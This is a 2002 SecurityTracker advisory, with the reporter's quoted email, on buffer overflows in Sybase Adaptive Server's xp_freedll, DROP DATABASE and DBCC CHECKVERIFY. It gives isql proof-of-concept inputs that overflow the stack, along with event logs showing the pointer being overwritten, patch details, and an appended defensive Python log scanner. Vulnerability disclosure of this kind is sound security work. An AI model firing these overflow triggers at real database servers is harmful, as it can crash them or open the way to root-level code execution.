SecurityTracker.com
Category:  Application (Database)  >  Adaptive Server
Vendors:  Sybase
Sybase Adaptive Server Buffer Overflows Let Local or Remote Authenticated Users Gain Root Privileges
SecurityTracker Alert ID:  1005721
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Nov 27 2002
Impact:  Execution of arbitrary code via local system, Execution of arbitrary code via network, Root access via local system, Root access via network
Fix Available:  Yes   Vendor Confirmed:  Yes  
Version(s): 12.0, 12.5
Description:  Several buffer overflow vulnerabilities were reported in the Sybase Adaptive Server. A local or remote authenticated user can gain root privileges on the system.

Application Security, Inc. reported that there are buffer overflows in the xp_freedll extended stored procedure, the built-in function DROP DATABASE, and the built-in function DBCC CHECKVERIFY.

An authenticated local or remote user can reportedly trigger an overflow in the extended stored procedure xp_freedll to overwrite the stack and execute arbitrary code with the privileges of the server. The procedure does not validate the length of a user-supplied argument (the name of the DLL to free). A demonstration exploit transcript is provided in the Source Message.

An authenticated user can also trigger a buffer overflow in the DROP DATABASE built-in function, as it does not validate the length of user-supplied input, according to Application Security, Inc.

A demonstration exploit transcript using the SQL tool isql.exe is provided:

1> declare @test varchar(16384)
2> select @test = replicate('A', 16384)
3> DROP DATABASE @test
4> go

The same type of flaw is reported in DBCC CHECKVERIFY built-in function. A demonstration exploit transcript using the SQL tool isql.exe is provided:

1> declare @test varchar(16384)
2> select @test = replicate('A', 16384)
3> DBCC CHECKVERIFY(@test)
4> go

For the full advisories prepared by Application Security, Inc., see the following URLs:

http://www.appsecinc.com/resources/alerts/sybase/02-0001.html
http://www.appsecinc.com/resources/alerts/sybase/02-0002.html
http://www.appsecinc.com/resources/alerts/sybase/02-0003.html

Impact:  An authenticated remote or local user can execute arbitrary code with root privileges.
Solution:  The author of the report recommends that execute permissions on the xp_freedll procedure should be revoked from public.

The vendor has also released the following patches:

12.5.0.2 - 11/14/2002
12.0.0.6 ESD#1 - 11/5/2002

The patches are available at:

http://downloads.sybase.com/swd/swx

Vendor URL:  www.sybase.com/products/databaseservers/ase
Cause:  Boundary error
Underlying OS:  Windows (NT)
Reported By:  "ASI Support" <support@appsecinc.com>
Message History:   None.


 Source Message Contents

Date:  Wed, 27 Nov 2002 14:07:38 -0500
From:  "ASI Support" <support@appsecinc.com>
Subject:  ASI Sybase Security Alert: Buffer overflow in xp_freedll

 

Sybase Adaptive Server buffer overflow in xp_freedll extended stored procedure

http://www.appsecinc.com/resources/alerts/sybase/02-0003.html

To determine if you should apply this hot fix, download AppDetective for
Sybase from http://www.sybasesecurity.net/products/appdetective/sybase/.

Risk level: High

Threat: Allows a non-privileged login to gain full control of the server

Versions Affected: Sybase Adaptive Server 12.0 and 12.5

Summary:
The extended stored procedure xp_freedll contains a buffer overflow that
may allow an attacker to overwrite the stack and execute arbitrary code
under the security context of the server. Execute permissions are
granted to public in the sybsystemprocs database on this extended stored
procedure.

Details:
Sybase Adaptive Server provides an extended stored procedure (ESP)
called xp_freedll in the database sybsystemprocs. This ESP is used to
release a DLL that has been loaded by another extended stored procedure.

Xp_freedll accepts a single parameter that is the name of the DLL to
free. Xp_freedll does not validate the length of the string passed into
the first parameter. It then attempts to copy an overly long string into
a small memory buffer. This memory copy results in the stack and the
stack pointer being overwritten with the buffer. Once the stack pointer
is overwritten, execution can be redirected to an arbitrary location in
memory and opcodes injected into the long string passed to the ESP can
be executed. This allows the attacker to run arbitrary code under the
security context of the extended stored procedure server.

Below is an example of overflowing the buffer using the SQL tool
isql.exe.

Memory corruption first occurs with a buffer of length 45. 
1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'
2> GO
Msg 11496, Level 16, State 7:
Procedure 'xp_freedll', Line 2:
Cannot read from site 'MRFREEZE_XP'. Please check the XP Server error
log file for detailed error description. (return status = -6)

With a buffer of 53 bytes in length, an exception is thrown.
1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'

2> GO

Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp. If this
is an user DLL check the code else contact Sybase Technical Support.
(return status = 1)


The following entries are recorded into the event logs.
11403:   Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp.
If this is an user DLL check the code else contact Sybase Technical
Support.  
11403:   Encountered an exception(193) in ESP xp_freedll in DLL
sybsyesp. If this is an user DLL check the code else contact Sybase
Technical Support.  
11403:   Encountered an exception(997) in ESP xp_freedll in DLL
sybsyesp. If this is an user DLL check the code else contact Sybase
Technical Support.  

At 54 bytes in length, the following memory locations appear in the event
logs:
11451:   MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
address 0x696c6c not in pool in 'srv_senddone()' .  
11451:   MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
address 0x696c6c not in pool in 'srv_sendinfo()' .  
11451:   MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
address 0x696c6c not in pool in 'srv_sendstatus' .  

At 55 bytes in length, the following memory locations appear in the event
logs:
11451:   MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
address 0x642e5858 not in pool in 'srv_senddone()' .  

Notice that the memory location has been modified to include 5858 which
is the X we used in the buffer overflow.

As we continue to increase the buffer size, we see that the address is
completely overwritten by the buffer.
11451:   MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
address 0x58585858 not in pool in 'srv_sendstatus' .  

Fix:
Execute permissions on the extended stored procedure xp_freedll in the
sybsystemprocs database should be revoked from public.

You should also apply the following patches:
12.5.0.2 - 11/14/2002
12.0.0.6 ESD#1 - 11/5/2002

These patches can be downloaded from http://downloads.sybase.com/swd/swx


Thank you,
support@appsecinc.com
Application Security, Inc.
phone: 212-490-6022
fax: 212-490-6456
-Protection Where It Counts-

----------------------------------------------------------------------
Application Security, Inc.
www.appsecinc.com
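The event-log entries quoted in the message above (message 11403 ESP exceptions, and message 11451 "Server process address ... not in pool" errors whose "address" is really the attacker's X bytes) are the kind of artefact a defender can watch for. The following Python script is an added example, not part of the advisory or of Application Security, Inc.'s material. It parses XP Server log lines of those two shapes, flags exceptions raised inside a watched ESP (xp_freedll by default) and flags "addresses" whose bytes are all printable ASCII, which is what 0x642e5858 and 0x58585858 in the advisory are: read little-endian they spell "XX.d" and "XXXX", the tail of the over-long "X...X.dll" argument. The sample log text is constructed from the advisory's quoted entries plus two benign lines added here (an ordinary-looking address, and an exception in a hypothetical ESP named xp_other) to show what the detector ignores.

```python
import re
from typing import Optional

# Constructed sample input: the first five lines are modelled on the event-log
# entries quoted in the advisory; the last two are benign lines added here
# (a normal-looking address, and an exception in a hypothetical ESP named
# xp_other) to show what the detector leaves alone.
SAMPLE_LOG = """\
11403:   Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp. If this is an user DLL check the code else contact Sybase Technical Support.
11403:   Encountered an exception(193) in ESP xp_freedll in DLL sybsyesp. If this is an user DLL check the code else contact Sybase Technical Support.
11451:   MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address 0x696c6c not in pool in 'srv_senddone()' .
11451:   MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address 0x642e5858 not in pool in 'srv_senddone()' .
11451:   MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address 0x58585858 not in pool in 'srv_sendstatus' .
11451:   MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address 0x0040a3c0 not in pool in 'srv_senddone()' .
11403:   Encountered an exception(0) in ESP xp_other in DLL sybsyesp. If this is an user DLL check the code else contact Sybase Technical Support.
"""

# Message 11403: an ESP raised an exception inside the XP Server.
EXC_RE = re.compile(r"Encountered an exception\((\d+)\) in ESP (\w+) in DLL (\w+)")
# Message 11451: the XP Server used a process pointer that is not in its pool.
ADDR_RE = re.compile(r"Server process address 0x([0-9A-Fa-f]{1,8}) not in pool in '([^']+)'")


def ascii_in_address(addr: int) -> Optional[str]:
    """Return the text a 32-bit little-endian address spells if every non-zero
    byte is printable ASCII and at least three bytes are set; otherwise None.
    A pointer made entirely of printable bytes is a strong sign that it was
    overwritten by string data, as with the advisory's 0x58585858."""
    raw = addr.to_bytes(4, "little")
    nonzero = [b for b in raw if b != 0]
    if len(nonzero) < 3:
        return None
    if all(0x20 <= b < 0x7F for b in nonzero):
        return bytes(nonzero).decode("ascii")
    return None


def scan_xp_server_log(text: str, watched_esps=frozenset({"xp_freedll"})) -> list:
    """Scan XP Server log text and return one finding dict per suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = EXC_RE.search(line)
        if m:
            code, esp, dll = m.groups()
            if esp in watched_esps:
                findings.append({"line": lineno, "kind": "esp_exception",
                                 "esp": esp, "code": int(code), "dll": dll})
            continue
        m = ADDR_RE.search(line)
        if m:
            addr = int(m.group(1), 16)
            spelled = ascii_in_address(addr)
            if spelled is not None:
                findings.append({"line": lineno, "kind": "ascii_address",
                                 "address": addr, "ascii": spelled,
                                 "function": m.group(2)})
    return findings


if __name__ == "__main__":
    for f in scan_xp_server_log(SAMPLE_LOG):
        if f["kind"] == "esp_exception":
            print(f"line {f['line']}: exception {f['code']} in watched ESP "
                  f"{f['esp']} ({f['dll']})")
        else:
            print(f"line {f['line']}: address 0x{f['address']:08x} in "
                  f"{f['function']} spells {f['ascii']!r}")
```

The printable-bytes heuristic is deliberately narrow: a legitimate pointer almost always contains at least one byte outside the printable range, so a hit on a 11451 entry is worth a closer look at which login called the ESP, while a single 11403 exception in a watched ESP is a weaker signal on its own and is better correlated with the login and statement that produced it.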

Copyright 2002, SecurityGlobal.net LLC